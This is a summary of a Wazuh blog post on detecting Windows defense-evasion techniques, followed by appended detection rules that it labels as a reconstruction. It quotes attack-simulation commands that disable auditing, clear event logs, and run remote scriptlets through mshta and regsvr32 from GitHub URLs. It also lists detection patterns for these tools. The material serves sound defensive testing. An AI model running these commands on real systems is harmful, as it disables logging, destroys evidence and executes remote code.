Keypoints
- Wazuh can detect defense evasion techniques on Windows endpoints by ingesting Sysmon event logs and using built-in and custom rules.
- Infrastructure for testing includes a Wazuh OVA (4.12.0) and a Windows 11 endpoint with the Wazuh agent enrolled.
- Custom detection rules for techniques such as BITS Jobs, MSHTA, and Regsvr32 are provided as XML rule snippets and assigned rule IDs (e.g., 110001–110003).
- Built-in Wazuh rules detect tampering with audit policy and log clearing (e.g., rule IDs 60112, 63103, 63104) and account/group changes (60109, 60110, 60111, 60154, 60160).
- Attack simulations use built-in Windows tools and Atomic Red Team payloads to emulate T1197, T1562.002, T1070.001, T1070.009, T1218.005, T1218.010, and rootkit-like behavior that modifies the hosts file.
- The Rootcheck module in Wazuh is used to detect rootkit-like changes; it runs scans every 12 hours by default, and a scan can be triggered immediately by restarting the agent.
- The post provides remediation or rollback commands to restore audit policies, event logs, created user accounts, hosts file, and to remove simulated downloads after testing.
MITRE Techniques
- [T1197] BITS Jobs – Abused the Windows Background Intelligent Transfer Service to download and execute payloads. Quote: 'bitsadmin.exe /transfer /Download /priority … %localappdata%\Temp\bitsdownload.txt'
- [T1562.002] Impair Defenses: Disable Windows Event Logging – Used auditpol to disable Windows auditing so that authentication events are no longer logged. Quote: 'auditpol /set /category:"Account Logon" /success:disable /failure:disable'
- [T1070.001] Indicator Removal: Clear Windows Event Logs – Used wevtutil to clear the System and Security event logs to hide activity. Quote: 'wevtutil cl System; wevtutil cl Security'
- [T1070.009] Indicator Removal: Clear Persistence – Created and then deleted a local user to remove persistence artifacts. Quote: 'New-LocalUser -Name "T1070" … Remove-LocalUser -Name "T1070"'
- [T1218.005] System Binary Proxy Execution: Mshta – Executed a remote scriptlet via mshta.exe, launching calc.exe in the simulation. Quote: 'mshta.exe javascript:a=(GetObject("script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct")).Exec();close();'
- [T1218.010] System Binary Proxy Execution: Regsvr32 – Used regsvr32.exe to execute a remote COM scriptlet from a URL, launching calc.exe in the simulation. Quote: 'regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct scrobj.dll'
- [T1014] Rootkit – Simulated rootkit-like behavior by modifying the hosts file to block security updates, detected via Rootcheck. Quote: 'Add-Content -Path "C:\Windows\System32\drivers\etc\hosts" -Value "`n127.0.0.1 microsoft.com"'
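Added example, not the post's own rule set: a reconstruction of what the custom rules 110001–110003 from the keypoints could look like, matching the bitsadmin, mshta and regsvr32 command lines quoted above against Sysmon Event ID 1 (process creation) events. It assumes Wazuh's stock Sysmon rule 61603 as the parent rule and the decoded field names win.eventdata.image and win.eventdata.commandLine.

```xml
<!-- Added example reconstructed from the page's description; not the post's own XML.
     Assumptions: Sysmon Event ID 1 is matched by built-in rule 61603, and Wazuh
     decodes the process image and command line into win.eventdata.image and
     win.eventdata.commandLine. -->
<group name="windows,sysmon,defense_evasion,">

  <!-- T1197: bitsadmin.exe used to transfer (download) a file -->
  <rule id="110001" level="10">
    <if_sid>61603</if_sid>
    <field name="win.eventdata.image" type="pcre2">(?i)\\bitsadmin\.exe$</field>
    <field name="win.eventdata.commandLine" type="pcre2">(?i)/transfer\b.*/download</field>
    <description>BITS Jobs: bitsadmin.exe used to download a file (T1197)</description>
    <mitre><id>T1197</id></mitre>
  </rule>

  <!-- T1218.005: mshta.exe launched with inline script or a remote URL -->
  <rule id="110002" level="10">
    <if_sid>61603</if_sid>
    <field name="win.eventdata.image" type="pcre2">(?i)\\mshta\.exe$</field>
    <field name="win.eventdata.commandLine" type="pcre2">(?i)(javascript:|vbscript:|https?://)</field>
    <description>Mshta: mshta.exe executing inline or remote script (T1218.005)</description>
    <mitre><id>T1218.005</id></mitre>
  </rule>

  <!-- T1218.010: regsvr32.exe loading a remote scriptlet through scrobj.dll -->
  <rule id="110003" level="10">
    <if_sid>61603</if_sid>
    <field name="win.eventdata.image" type="pcre2">(?i)\\regsvr32\.exe$</field>
    <field name="win.eventdata.commandLine" type="pcre2">(?i)/i:https?://.*scrobj\.dll</field>
    <description>Regsvr32: remote COM scriptlet loaded via scrobj.dll (T1218.010)</description>
    <mitre><id>T1218.010</id></mitre>
  </rule>

</group>
```

Place the group in /var/ossec/etc/rules/local_rules.xml on the manager and restart wazuh-manager; a quick check is to run the post's own bitsadmin test command on the enrolled endpoint and confirm an alert with rule.id 110001 in the dashboard.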
Indicators of Compromise
- [File names] Simulated payloads and artifacts – bitsdownload.txt (downloaded via BITS), RegSvr32.sct and mshta.sct (remote scriptlets used in the simulations)
- [Command lines] Suspicious command usage – examples include bitsadmin.exe /transfer /Download …, mshta.exe javascript:…, regsvr32.exe /s /u /i:… scrobj.dll
- [Log/event IDs] Wazuh detection rule IDs and Windows event sources – rule.id 110001, 110002, 110003, 60112, 63103, 63104, 60109–60111, 60154, 60160, and 513 (Rootcheck alert)
- [Domains/URLs] Remote scriptlet URLs used in the simulations – raw.githubusercontent.com/redcanaryco/atomic-red-team/… (Atomic Red Team resources)
Read more: https://wazuh.com/blog/detecting-defense-evasion-techniques-with-wazuh/